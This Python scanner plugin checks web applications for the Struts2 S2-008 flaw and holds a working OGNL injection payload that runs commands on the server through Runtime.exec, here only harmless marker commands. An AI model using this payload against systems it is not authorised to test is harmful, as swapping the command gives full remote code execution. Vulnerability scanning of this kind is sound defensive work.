import warnings
import requests
import random
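# Hide only urllib3's "Unverified HTTPS request" notice, which requests emits
# for calls made with verify=False. A blanket "ignore" would also silence every
# other warning in the process (deprecations, unrelated TLS warnings), and a
# scanner that loads many plugins would lose all of them.
warnings.filterwarnings("ignore", message="Unverified HTTPS request")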
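def poc(url, **kwargs):
    """Probe one target for the Struts2 S2-008 debug-command exposure.

    Two GET requests are sent to ``?debug=command&expression=...``, each
    wrapping a marker command in an OGNL expression: ``print goop`` and
    ``expr A - B`` with two random integers.  The target is reported when a
    response body contains the computed difference or one of the
    ``... device PRN`` error strings (presumably the output of ``print`` on a
    Windows host, in several encodings).

    A positive result means the debugging interceptor answered, which
    normally indicates that ``struts.devMode`` is enabled on the target; the
    remediation is to disable developer mode in production and upgrade Struts.

    Args:
        url: Base URL of the application; used as given unless ``ip`` is set.
        **kwargs: Optional ``ip`` and ``port``.  When ``ip`` is truthy the
            target becomes ``http://<ip>:<port>`` and ``url`` is ignored.

    Returns:
        A message naming the target when a marker is found, otherwise
        ``None`` (also when every request fails).
    """
    ip = kwargs.get('ip')
    if ip:
        port = kwargs.get('port')
        # %s formatting accepts an integer port; a missing port falls back to
        # the scheme default instead of raising TypeError on concatenation.
        url = 'http://%s:%s' % (ip, port) if port else 'http://%s' % ip
    timeout = 10

    ran_a = random.randint(10000000, 20000000)
    ran_b = random.randint(1000000, 2000000)
    # The difference never appears in the request itself, so finding it in the
    # body means the arithmetic was evaluated on the server side.
    markers = [
        str(ran_a - ran_b),
        '无法初始化设备 PRN',
        '??????? PRN',
        'Unable to initialize device PRN',
    ]
    lin = 'expr' + ' ' + str(ran_a) + ' - ' + str(ran_b)

    # Both probes share the same OGNL wrapper and differ only in the command.
    ognl_prefix = r"?debug=command&expression=(%23_memberAccess%5B%22allowStaticMethodAccess%22%5D%3Dtrue%2C%23foo%3Dnew%20java.lang.Boolean%28%22false%22%29%20%2C%23context%5B%22xwork.MethodAccessor.denyMethodExecution%22%5D%3D%23foo%2C@org.apache.commons.io.IOUtils@toString%28@java.lang.Runtime@getRuntime%28%29.exec%28%27"
    ognl_suffix = r"%27%29.getInputStream%28%29%29)"
    poc_goop = [
        ognl_prefix + 'print goop' + ognl_suffix,
        ognl_prefix + lin + ognl_suffix,
    ]

    headers = {
        "Accept": "application/x-shockwave-flash, image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*",
        "User-Agent": 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:52.0) Gecko/20100101 Firefox/52.0',
        "Content-Type": "application/x-www-form-urlencoded"
    }

    # Message text: "target is affected by Struts2-008".
    result = "目标存在 Struts2-008, check url: %s" % url
    for test in poc_goop:
        try:
            # NOTE(review): verify=False turns off TLS certificate validation,
            # so an https target's identity is not checked and an on-path host
            # could answer in its place.
            req = requests.get(url + test, headers=headers, timeout=timeout, verify=False)
        except requests.RequestException:
            # One failed request must not cancel the remaining probe.
            continue
        # Substring match over the whole body; confirm a hit manually before
        # recording it as a finding.
        if any(marker in req.text for marker in markers):
            return result
    return None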